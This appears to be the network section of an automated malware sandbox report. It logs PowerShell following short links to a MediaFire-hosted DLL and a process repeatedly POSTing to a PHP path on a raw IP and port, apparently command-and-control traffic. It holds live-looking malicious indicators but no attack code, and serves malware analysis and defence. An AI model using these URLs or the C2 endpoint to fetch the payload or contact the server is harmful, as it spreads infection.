                                                                                                                                                                      Jan 14, 2022 12:21:43.808947086 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:43.851597071 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:43.851753950 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:44.063294888 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:44.233500957 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:44.233944893 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:44.396948099 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:44.397135019 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:44.575247049 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:44.575479984 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:44.605777025 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:44.743788004 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:44.743968010 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:44.955357075 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:45.025909901 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:45.026185989 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:45.190582037 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:45.190735102 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:45.402507067 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:45.468019962 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:45.517297029 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:45.818732023 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:45.909154892 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:45.909425020 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:45.986419916 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:45.986587048 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:46.073987961 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:46.074310064 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:46.203845024 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:46.278192997 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:46.630821943 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:46.673599005 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:46.777786970 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:46.829901934 CET498388081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:51.647073030 CET808149839207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:51.647176981 CET498398081192.168.2.3207.32.217.137
                                                                                                                                                                      Jan 14, 2022 12:21:51.797604084 CET808149838207.32.217.137192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:51.797739983 CET498388081192.168.2.3207.32.217.137

                                                                                                                                                                      UDP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Jan 14, 2022 12:20:22.204716921 CET5265053192.168.2.38.8.8.8
                                                                                                                                                                      Jan 14, 2022 12:20:22.234134912 CET53526508.8.8.8192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:22.242671967 CET6329753192.168.2.38.8.8.8
                                                                                                                                                                      Jan 14, 2022 12:20:22.262916088 CET53632978.8.8.8192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:22.414657116 CET5836153192.168.2.38.8.8.8
                                                                                                                                                                      Jan 14, 2022 12:20:22.433346987 CET53583618.8.8.8192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:22.578947067 CET5361553192.168.2.38.8.8.8
                                                                                                                                                                      Jan 14, 2022 12:20:22.601367950 CET53536158.8.8.8192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:20:23.376775980 CET5072853192.168.2.38.8.8.8
                                                                                                                                                                      Jan 14, 2022 12:20:23.403084993 CET53507288.8.8.8192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:08.886485100 CET5153953192.168.2.38.8.8.8
                                                                                                                                                                      Jan 14, 2022 12:21:08.914592028 CET53515398.8.8.8192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:08.964663029 CET5539353192.168.2.38.8.8.8
                                                                                                                                                                      Jan 14, 2022 12:21:08.991859913 CET53553938.8.8.8192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:09.338764906 CET5058553192.168.2.38.8.8.8
                                                                                                                                                                      Jan 14, 2022 12:21:09.367983103 CET53505858.8.8.8192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:09.378473043 CET6345653192.168.2.38.8.8.8
                                                                                                                                                                      Jan 14, 2022 12:21:09.399285078 CET53634568.8.8.8192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:09.737730026 CET5854053192.168.2.38.8.8.8
                                                                                                                                                                      Jan 14, 2022 12:21:09.761588097 CET53585408.8.8.8192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:09.933792114 CET5510853192.168.2.38.8.8.8
                                                                                                                                                                      Jan 14, 2022 12:21:09.959575891 CET53551088.8.8.8192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:09.964220047 CET5894253192.168.2.38.8.8.8
                                                                                                                                                                      Jan 14, 2022 12:21:10.000703096 CET53589428.8.8.8192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:10.488233089 CET6443253192.168.2.38.8.8.8
                                                                                                                                                                      Jan 14, 2022 12:21:10.511466980 CET53644328.8.8.8192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:17.365070105 CET6511053192.168.2.38.8.8.8
                                                                                                                                                                      Jan 14, 2022 12:21:17.390278101 CET53651108.8.8.8192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:17.406208038 CET6112053192.168.2.38.8.8.8
                                                                                                                                                                      Jan 14, 2022 12:21:17.431751966 CET53611208.8.8.8192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:17.729667902 CET5307953192.168.2.38.8.8.8
                                                                                                                                                                      Jan 14, 2022 12:21:17.752984047 CET53530798.8.8.8192.168.2.3
                                                                                                                                                                      Jan 14, 2022 12:21:18.543745995 CET5082453192.168.2.38.8.8.8
                                                                                                                                                                      Jan 14, 2022 12:21:18.566832066 CET53508248.8.8.8192.168.2.3

                                                                                                                                                                      DNS Queries

                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                      Jan 14, 2022 12:20:22.204716921 CET192.168.2.38.8.8.80x757dStandard query (0)www.j.mpA (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:20:22.242671967 CET192.168.2.38.8.8.80xf56aStandard query (0)www.j.mpA (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:20:22.414657116 CET192.168.2.38.8.8.80xf000Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:20:22.578947067 CET192.168.2.38.8.8.80x536eStandard query (0)www.mediafire.comA (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:20:23.376775980 CET192.168.2.38.8.8.80x2952Standard query (0)download2262.mediafire.comA (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:08.886485100 CET192.168.2.38.8.8.80xbf75Standard query (0)p26ynn.blogspot.comA (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:08.964663029 CET192.168.2.38.8.8.80xe8b4Standard query (0)p26ynn.blogspot.comA (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:09.338764906 CET192.168.2.38.8.8.80x1872Standard query (0)p6tbbb.blogspot.comA (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:09.378473043 CET192.168.2.38.8.8.80x5357Standard query (0)p6tbbb.blogspot.comA (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:09.737730026 CET192.168.2.38.8.8.80x3839Standard query (0)www.mediafire.comA (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:09.933792114 CET192.168.2.38.8.8.80xa84Standard query (0)5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.comA (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:09.964220047 CET192.168.2.38.8.8.80x23abStandard query (0)5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.comA (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:10.488233089 CET192.168.2.38.8.8.80x56a5Standard query (0)download2262.mediafire.comA (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:17.365070105 CET192.168.2.38.8.8.80x6f3dStandard query (0)p6tbbb.blogspot.comA (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:17.406208038 CET192.168.2.38.8.8.80xdd7fStandard query (0)p6tbbb.blogspot.comA (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:17.729667902 CET192.168.2.38.8.8.80xe121Standard query (0)www.mediafire.comA (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:18.543745995 CET192.168.2.38.8.8.80x6075Standard query (0)download2262.mediafire.comA (IP address)IN (0x0001)

                                                                                                                                                                      DNS Answers

                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                      Jan 14, 2022 12:20:22.234134912 CET8.8.8.8192.168.2.30x757dNo error (0)www.j.mpj.mpCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:20:22.234134912 CET8.8.8.8192.168.2.30x757dNo error (0)j.mp67.199.248.17A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:20:22.234134912 CET8.8.8.8192.168.2.30x757dNo error (0)j.mp67.199.248.16A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:20:22.262916088 CET8.8.8.8192.168.2.30xf56aNo error (0)www.j.mpj.mpCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:20:22.262916088 CET8.8.8.8192.168.2.30xf56aNo error (0)j.mp67.199.248.17A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:20:22.262916088 CET8.8.8.8192.168.2.30xf56aNo error (0)j.mp67.199.248.16A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:20:22.433346987 CET8.8.8.8192.168.2.30xf000No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:20:22.433346987 CET8.8.8.8192.168.2.30xf000No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:20:22.601367950 CET8.8.8.8192.168.2.30x536eNo error (0)www.mediafire.com104.16.202.237A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:20:22.601367950 CET8.8.8.8192.168.2.30x536eNo error (0)www.mediafire.com104.16.203.237A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:20:23.403084993 CET8.8.8.8192.168.2.30x2952No error (0)download2262.mediafire.com199.91.155.3A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:08.914592028 CET8.8.8.8192.168.2.30xbf75No error (0)p26ynn.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:08.914592028 CET8.8.8.8192.168.2.30xbf75No error (0)blogspot.l.googleusercontent.com142.250.186.129A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:08.991859913 CET8.8.8.8192.168.2.30xe8b4No error (0)p26ynn.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:08.991859913 CET8.8.8.8192.168.2.30xe8b4No error (0)blogspot.l.googleusercontent.com142.250.186.129A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:09.367983103 CET8.8.8.8192.168.2.30x1872No error (0)p6tbbb.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:09.367983103 CET8.8.8.8192.168.2.30x1872No error (0)blogspot.l.googleusercontent.com142.250.186.129A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:09.399285078 CET8.8.8.8192.168.2.30x5357No error (0)p6tbbb.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:09.399285078 CET8.8.8.8192.168.2.30x5357No error (0)blogspot.l.googleusercontent.com142.250.186.129A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:09.761588097 CET8.8.8.8192.168.2.30x3839No error (0)www.mediafire.com104.16.203.237A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:09.761588097 CET8.8.8.8192.168.2.30x3839No error (0)www.mediafire.com104.16.202.237A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:09.959575891 CET8.8.8.8192.168.2.30xa84No error (0)5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.commedia-router.wixstatic.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:09.959575891 CET8.8.8.8192.168.2.30xa84No error (0)media-router.wixstatic.comgcp.media-router.wixstatic.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:09.959575891 CET8.8.8.8192.168.2.30xa84No error (0)gcp.media-router.wixstatic.com34.102.176.152A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:10.000703096 CET8.8.8.8192.168.2.30x23abNo error (0)5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.commedia-router.wixstatic.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:10.000703096 CET8.8.8.8192.168.2.30x23abNo error (0)media-router.wixstatic.comgcp.media-router.wixstatic.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:10.000703096 CET8.8.8.8192.168.2.30x23abNo error (0)gcp.media-router.wixstatic.com34.102.176.152A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:10.511466980 CET8.8.8.8192.168.2.30x56a5No error (0)download2262.mediafire.com199.91.155.3A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:17.390278101 CET8.8.8.8192.168.2.30x6f3dNo error (0)p6tbbb.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:17.390278101 CET8.8.8.8192.168.2.30x6f3dNo error (0)blogspot.l.googleusercontent.com142.250.186.129A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:17.431751966 CET8.8.8.8192.168.2.30xdd7fNo error (0)p6tbbb.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:17.431751966 CET8.8.8.8192.168.2.30xdd7fNo error (0)blogspot.l.googleusercontent.com142.250.186.129A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:17.752984047 CET8.8.8.8192.168.2.30xe121No error (0)www.mediafire.com104.16.202.237A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:17.752984047 CET8.8.8.8192.168.2.30xe121No error (0)www.mediafire.com104.16.203.237A (IP address)IN (0x0001)
                                                                                                                                                                      Jan 14, 2022 12:21:18.566832066 CET8.8.8.8192.168.2.30x6075No error (0)download2262.mediafire.com199.91.155.3A (IP address)IN (0x0001)

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • www.mediafire.com
                                                                                                                                                                      • download2262.mediafire.com
                                                                                                                                                                      • p6tbbb.blogspot.com
                                                                                                                                                                      • p26ynn.blogspot.com
                                                                                                                                                                      • 5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com
                                                                                                                                                                      • www.j.mp
                                                                                                                                                                      • bit.ly
                                                                                                                                                                      • 207.32.217.137:8081

                                                                                                                                                                      HTTP Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      0192.168.2.349780104.16.202.237443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      1192.168.2.349784199.91.155.3443C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      10192.168.2.34977667.199.248.1780C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Jan 14, 2022 12:20:22.301415920 CET2085OUTGET /asasdjiasjdiasjasdasddik HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: www.j.mp
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jan 14, 2022 12:20:22.405754089 CET2096INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:20:22 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 178
                                                                                                                                                                      Location: http://bit.ly/asasdjiasjdiasjasdasddik
                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      11192.168.2.34977867.199.248.1180C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Jan 14, 2022 12:20:22.456866980 CET2097OUTGET /asasdjiasjdiasjasdasddik HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: bit.ly
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jan 14, 2022 12:20:22.572482109 CET2100INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:20:22 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Content-Length: 144
                                                                                                                                                                      Cache-Control: private, max-age=90
                                                                                                                                                                      Location: https://www.mediafire.com/file/nm9ysba5ejf20r8/6.dll/file
                                                                                                                                                                      Set-Cookie: _bit=m0ebkm-37b6939199dc18fdfa-00h; Domain=bit.ly; Expires=Wed, 13 Jul 2022 11:20:22 GMT
                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 65 64 69 61 66 69 72 65 2e 63 6f 6d 2f 66 69 6c 65 2f 6e 6d 39 79 73 62 61 35 65 6a 66 32 30 72 38 2f 36 2e 64 6c 6c 2f 66 69 6c 65 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                      Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://www.mediafire.com/file/nm9ysba5ejf20r8/6.dll/file">moved here</a></body></html>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      12192.168.2.349838207.32.217.1378081C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Jan 14, 2022 12:21:34.991374016 CET12546OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Jan 14, 2022 12:21:35.154923916 CET12546INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:36.195101976 CET12547INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:35 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:36.485162020 CET12547OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:36.649009943 CET12547INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:37.366311073 CET12549INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:36 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:37.367117882 CET12549OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 284
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:37.532186031 CET12549INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:38.251178026 CET12551INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:37 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:38.251667976 CET12551OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:38.415117025 CET12551INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:39.046580076 CET12553INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:38 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:39.047854900 CET12553OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 284
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:39.210978985 CET12553INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:39.940015078 CET12555INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:39 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:39.986772060 CET12555OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 282
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:40.149746895 CET12555INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:40.768908024 CET12557INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:40 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Jan 14, 2022 12:21:40.769465923 CET12557OUTPOST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Host: 207.32.217.137:8081
                                                                                                                                                                      Content-Length: 284
                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                      Jan 14, 2022 12:21:40.932802916 CET12557INHTTP/1.1 100 Continue
                                                                                                                                                                      Jan 14, 2022 12:21:42.142028093 CET12559INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:40 GMT
                                                                                                                                                                      Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                      X-Powered-By: PHP/7.4.27
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
